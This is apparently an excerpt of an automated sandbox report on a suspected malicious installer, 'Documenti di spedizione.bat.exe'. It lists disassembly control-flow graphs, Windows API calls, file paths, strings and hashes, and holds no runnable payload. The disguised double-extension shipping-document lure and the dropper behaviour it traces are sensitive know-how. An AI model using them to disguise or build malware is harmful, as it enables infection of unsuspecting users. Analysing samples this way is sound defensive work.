40602c-406035 call 405f19 470->476 471->449 472->471 472->475 473->474 474->472 477 406062-40606c 474->477 475->471 480 4060c9-4060cf lstrcatA 475->480 476->472 482 406086-40609c SHGetSpecialFolderLocation 477->482 483 40606e-406071 477->483 480->471 486 4060b7 482->486 487 40609e-4060b5 SHGetPathFromIDListA CoTaskMemFree 482->487 483->482 485 406073-40607a 483->485 488 406082-406084 485->488 486->474 487->472 487->486 488->472 488->482
                                            APIs
                                            • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00405148,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000), ref: 00405FCA
                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406045
                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00406058
                                            • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406094
                                            • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 004060A2
                                            • CoTaskMemFree.OLE32(00000000), ref: 004060AD
                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060CF
                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00405148,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000), ref: 00406121
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$-L
                                            • API String ID: 900638850-1549501429
                                            • Opcode ID: 91bdcf4667245f18d3d7c7fe1ddc958c0af6ea5d13b0ad944f7f20b056a88a1b
                                            • Instruction ID: 17f1afa1df4653d6aa239bb2462815deac18f6a32033811d9d8cd7bf3bfa2e02
                                            • Opcode Fuzzy Hash: 91bdcf4667245f18d3d7c7fe1ddc958c0af6ea5d13b0ad944f7f20b056a88a1b
                                            • Instruction Fuzzy Hash: 68613671A00111AEDF209F24CC84BBF3BA8EB45314F12813BE942BA2D1D77D4962DB5E
                                            APIs
                                              • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                            • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                            • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                            • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                            • GlobalFree.KERNEL32(?), ref: 10001CC4
                                            • GlobalFree.KERNEL32(?), ref: 10001CC9
                                            • GlobalFree.KERNEL32(?), ref: 10001CCE
                                            • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                            • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc
                                            • String ID:
                                            • API String ID: 4227406936-0
                                            • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                            • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                            • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                            • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 689 405799-4057bf call 405a57 692 4057c1-4057d3 DeleteFileA 689->692 693 4057d8-4057df 689->693 694 405962-405966 692->694 695 4057e1-4057e3 693->695 696 4057f2-405802 call 405ef7 693->696 697 405910-405915 695->697 698 4057e9-4057ec 695->698 702 405811-405812 call 4059b0 696->702 703 405804-40580f lstrcatA 696->703 697->694 700 405917-40591a 697->700 698->696 698->697 704 405924-40592c call 4061fb 700->704 705 40591c-405922 700->705 706 405817-40581a 702->706 703->706 704->694 713 40592e-405942 call 405969 call 405751 704->713 705->694 709 405825-40582b lstrcatA 706->709 710 40581c-405823 706->710 712 405830-40584e lstrlenA FindFirstFileA 709->712 710->709 710->712 714 405854-40586b call 405994 712->714 715 405906-40590a 712->715 725 405944-405947 713->725 726 40595a-40595d call 405110 713->726 723 405876-405879 714->723 724 40586d-405871 714->724 715->697 717 40590c 715->717 717->697 728 40587b-405880 723->728 729 40588c-40589a call 405ef7 723->729 724->723 727 405873 724->727 725->705 731 405949-405958 call 405110 call 405db2 725->731 726->694 727->723 733 405882-405884 728->733 734 4058e5-4058f7 FindNextFileA 728->734 739 4058b1-4058bc call 405751 729->739 740 40589c-4058a4 729->740 731->694 733->729 738 405886-40588a 733->738 734->714 737 4058fd-405900 FindClose 734->737 737->715 738->729 738->734 749 4058dd-4058e0 call 405110 739->749 750 4058be-4058c1 739->750 740->734 742 4058a6-4058af call 405799 740->742 742->734 749->734 752 4058c3-4058d3 call 405110 call 405db2 750->752 753 4058d5-4058db 750->753 752->734 753->734
                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,75923410,75922EE0,00000000), ref: 004057C2
                                            • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040580A
                                            • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040582B
                                            • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405831
                                            • FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405842
                                            • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058EF
                                            • FindClose.KERNEL32(00000000), ref: 00405900
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$8B$\*.*
                                            • API String ID: 2035342205-2776379736
                                            • Opcode ID: cfe99db393b1e675a819fff40dd9f0895a0815041bfdd0424623d1025dab5344
                                            • Instruction ID: 8d03ba635bdf6d692437a4f2007131f6bbb84493a6188974bf12e3b4770be62e
                                            • Opcode Fuzzy Hash: cfe99db393b1e675a819fff40dd9f0895a0815041bfdd0424623d1025dab5344
                                            • Instruction Fuzzy Hash: 3E51AF71900A14EADF217B618C49BAF7AB8DF42724F14807BF850762D2D73C8992DE6D
                                            APIs
                                            • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                            Strings
                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid, xrefs: 0040218C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid
                                            • API String ID: 123533781-2470430059
                                            • Opcode ID: f23b3e070ea651c53f475647926b923c96bbc9cd24cd4c0868bd15dc3a0dd132
                                            • Instruction ID: 13bc962cd5a1e0844f107594f4b7cb0b9a1bacf2988c66099de3663f442cfceb
                                            • Opcode Fuzzy Hash: f23b3e070ea651c53f475647926b923c96bbc9cd24cd4c0868bd15dc3a0dd132
                                            • Instruction Fuzzy Hash: 5A5107B5E00208BFCB00DFE4C988A9DBBB6EF48314F2445AAF515FB2D1DA799941CB54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                            • Instruction ID: 395035d2fa7d2bfd2a07fc8d885f942395c55dc3dc65efbd6096f39d55049081
                                            • Opcode Fuzzy Hash: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                            • Instruction Fuzzy Hash: 18F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96DF44
                                            APIs
                                            • FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A9A,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00406206
                                            • FindClose.KERNEL32(00000000), ref: 00406212
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\
                                            • API String ID: 2295610775-3404278061
                                            • Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                            • Instruction ID: 9db82b8fa8063fa17328456ed946e1162a1eeecbf7bffbc6415ee5c88b4ce2a6
                                            • Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                            • Instruction Fuzzy Hash: 6FD0133555D02057C30027746C0C44779545F653307124B77F456F52F0D3345C7245DD
                                            APIs
                                            • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040271A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: e9e1605c35cf92ad64c5223491071bd3b38123b796805ea0b055523b80a06de9
                                            • Instruction ID: 73f39e672a50c1adebb7c94b7850a11d736dff73d217dd7b8340578855458d28
                                            • Opcode Fuzzy Hash: e9e1605c35cf92ad64c5223491071bd3b38123b796805ea0b055523b80a06de9
                                            • Instruction Fuzzy Hash: 2CF02772604004AAC700EB6499089EEB778DB15324F60007BF180B20C0C7B84A429B2A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 179 403c09-403c1b 180 403c21-403c27 179->180 181 403d5c-403d6b 179->181 180->181 182 403c2d-403c36 180->182 183 403dba-403dcf 181->183 184 403d6d-403db5 GetDlgItem * 2 call 4040dc SetClassLongA call 40140b 181->184 185 403c38-403c45 SetWindowPos 182->185 186 403c4b-403c4e 182->186 188 403dd1-403dd4 183->188 189 403e0f-403e14 call 404128 183->189 184->183 185->186 190 403c50-403c62 ShowWindow 186->190 191 403c68-403c6e 186->191 193 403dd6-403de1 call 401389 188->193 194 403e07-403e09 188->194 196 403e19-403e34 189->196 190->191 197 403c70-403c85 DestroyWindow 191->197 198 403c8a-403c8d 191->198 193->194 216 403de3-403e02 SendMessageA 193->216 194->189 201 4040a9 194->201 202 403e36-403e38 call 40140b 196->202 203 403e3d-403e43 196->203 205 404086-40408c 197->205 207 403ca0-403ca6 198->207 208 403c8f-403c9b SetWindowLongA 198->208 204 4040ab-4040b2 201->204 202->203 212 404067-404080 DestroyWindow EndDialog 203->212 213 403e49-403e54 203->213 205->201 210 40408e-404094 205->210 214 403d49-403d57 call 404143 207->214 215 403cac-403cbd GetDlgItem 207->215 208->204 210->201 217 404096-40409f ShowWindow 210->217 212->205 213->212 218 403e5a-403ea7 call 405f19 call 4040dc * 3 GetDlgItem 213->218 214->204 219 403cdc-403cdf 215->219 220 403cbf-403cd6 SendMessageA IsWindowEnabled 215->220 216->204 217->201 249 403eb1-403eed ShowWindow KiUserCallbackDispatcher call 4040fe EnableWindow 218->249 250 403ea9-403eae 218->250 224 403ce1-403ce2 219->224 225 403ce4-403ce7 219->225 220->201 220->219 227 403d12-403d17 call 4040b5 224->227 228 403cf5-403cfa 225->228 229 403ce9-403cef 225->229 227->214 230 403d30-403d43 SendMessageA 228->230 231 403cfc-403d02 228->231 229->230 234 403cf1-403cf3 229->234 230->214 235 403d04-403d0a call 40140b 231->235 236 403d19-403d22 call 40140b 231->236 234->227 245 403d10 235->245 236->214 246 403d24-403d2e 236->246 245->227 246->245 253 403ef2 249->253 254 403eef-403ef0 249->254 250->249 255 403ef4-403f22 GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403f24-403f35 SendMessageA 255->256 257 403f37 255->257 258 403f3d-403f76 call 404111 call 405ef7 lstrlenA call 405f19 SetWindowTextA call 401389 256->258 257->258 258->196 267 403f7c-403f7e 258->267 267->196 268 403f84-403f88 267->268 269 403fa7-403fbb DestroyWindow 268->269 270 403f8a-403f90 268->270 269->205 272 403fc1-403fee CreateDialogParamA 269->272 270->201 271 403f96-403f9c 270->271 271->196 273 403fa2 271->273 272->205 274 403ff4-40404b call 4040dc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->201 274->201 279 40404d-404060 ShowWindow call 404128 274->279 281 404065 279->281 281->205
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C45
                                            • ShowWindow.USER32(?), ref: 00403C62
                                            • DestroyWindow.USER32 ref: 00403C76
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C92
                                            • GetDlgItem.USER32(?,?), ref: 00403CB3
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC7
                                            • IsWindowEnabled.USER32(00000000), ref: 00403CCE
                                            • GetDlgItem.USER32(?,00000001), ref: 00403D7C
                                            • GetDlgItem.USER32(?,00000002), ref: 00403D86
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403DA0
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403DF1
                                            • GetDlgItem.USER32(?,00000003), ref: 00403E97
                                            • ShowWindow.USER32(00000000,?), ref: 00403EB8
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECA
                                            • EnableWindow.USER32(?,?), ref: 00403EE5
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFB
                                            • EnableMenuItem.USER32(00000000), ref: 00403F02
                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F1A
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F2D
                                            • lstrlenA.KERNEL32(Gazi Setup: Installing,?,Gazi Setup: Installing,00422F20), ref: 00403F56
                                            • SetWindowTextA.USER32(?,Gazi Setup: Installing), ref: 00403F65
                                            • ShowWindow.USER32(?,0000000A), ref: 00404099
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID: Gazi Setup: Installing$dK
                                            • API String ID: 3282139019-1064461354
                                            • Opcode ID: bcb4864de90c51be376c5c7d5e0fb192880a71d4046b15d718494db90bb2b626
                                            • Instruction ID: 2eb83949b6bd8974722fa043abbaf2d62199bae10e2b8edc7fb886fd11b27e7e
                                            • Opcode Fuzzy Hash: bcb4864de90c51be376c5c7d5e0fb192880a71d4046b15d718494db90bb2b626
                                            • Instruction Fuzzy Hash: 3EC1F2B1604201BBDB20AF61EE84E2B3ABCFB84305F51053EF611B11E1C7799842EB5E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 282 403877-40388f call 406290 285 403891-4038a1 call 405e55 282->285 286 4038a3-4038d4 call 405dde 282->286 293 4038f7-403920 call 403b3c call 405a57 285->293 291 4038d6-4038e7 call 405dde 286->291 292 4038ec-4038f2 lstrcatA 286->292 291->292 292->293 300 403926-40392b 293->300 301 4039a7-4039af call 405a57 293->301 300->301 302 40392d-403945 call 405dde 300->302 307 4039b1-4039b8 call 405f19 301->307 308 4039bd-4039e2 LoadImageA 301->308 306 40394a-403951 302->306 306->301 309 403953-403955 306->309 307->308 311 403a63-403a6b call 40140b 308->311 312 4039e4-403a14 RegisterClassA 308->312 314 403966-403972 lstrlenA 309->314 315 403957-403964 call 405994 309->315 324 403a75-403a80 call 403b3c 311->324 325 403a6d-403a70 311->325 316 403b32 312->316 317 403a1a-403a5e SystemParametersInfoA CreateWindowExA 312->317 321 403974-403982 lstrcmpiA 314->321 322 40399a-4039a2 call 405969 call 405ef7 314->322 315->314 320 403b34-403b3b 316->320 317->311 321->322 323 403984-40398e GetFileAttributesA 321->323 322->301 328 403990-403992 323->328 329 403994-403995 call 4059b0 323->329 335 403a86-403aa0 ShowWindow call 406222 324->335 336 403b09-403b0a call 4051e2 324->336 325->320 328->322 328->329 329->322 343 403aa2-403aa7 call 406222 335->343 344 403aac-403abe GetClassInfoA 335->344 339 403b0f-403b11 336->339 341 403b13-403b19 339->341 342 403b2b-403b2d call 40140b 339->342 341->325 345 403b1f-403b26 call 40140b 341->345 342->316 343->344 348 403ac0-403ad0 GetClassInfoA RegisterClassA 344->348 349 403ad6-403af9 DialogBoxParamA call 40140b 344->349 345->325 348->349 352 403afe-403b07 call 4037c7 349->352 352->320
                                            APIs
                                              • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                              • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                            • lstrcatA.KERNEL32(1033,Gazi Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Gazi Setup: Installing,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00000000), ref: 004038F2
                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously,1033,Gazi Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Gazi Setup: Installing,00000000,00000002,75923410), ref: 00403967
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 0040397A
                                            • GetFileAttributesA.KERNEL32(Call), ref: 00403985
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously), ref: 004039CE
                                              • Part of subcall function 00405E55: wsprintfA.USER32 ref: 00405E62
                                            • RegisterClassA.USER32(00422EC0), ref: 00403A0B
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A23
                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A58
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403A8E
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403ABA
                                            • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403AC7
                                            • RegisterClassA.USER32(00422EC0), ref: 00403AD0
                                            • DialogBoxParamA.USER32(?,00000000,00403C09,00000000), ref: 00403AEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$Gazi Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 1975747703-947547890
                                            • Opcode ID: b5acaa8937ced472a66d3687a921226f39372a12dbbf564bd8eff0e0bc24d963
                                            • Instruction ID: 29345e8072be8e75dc90901d6125d60d13300850aec60374d900494af90ecb47
                                            • Opcode Fuzzy Hash: b5acaa8937ced472a66d3687a921226f39372a12dbbf564bd8eff0e0bc24d963
                                            • Instruction Fuzzy Hash: 8161A4B06442407ED620AF65AD45F373A6CEB8474AF40447FF945B22E2C6BCAD029A3D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
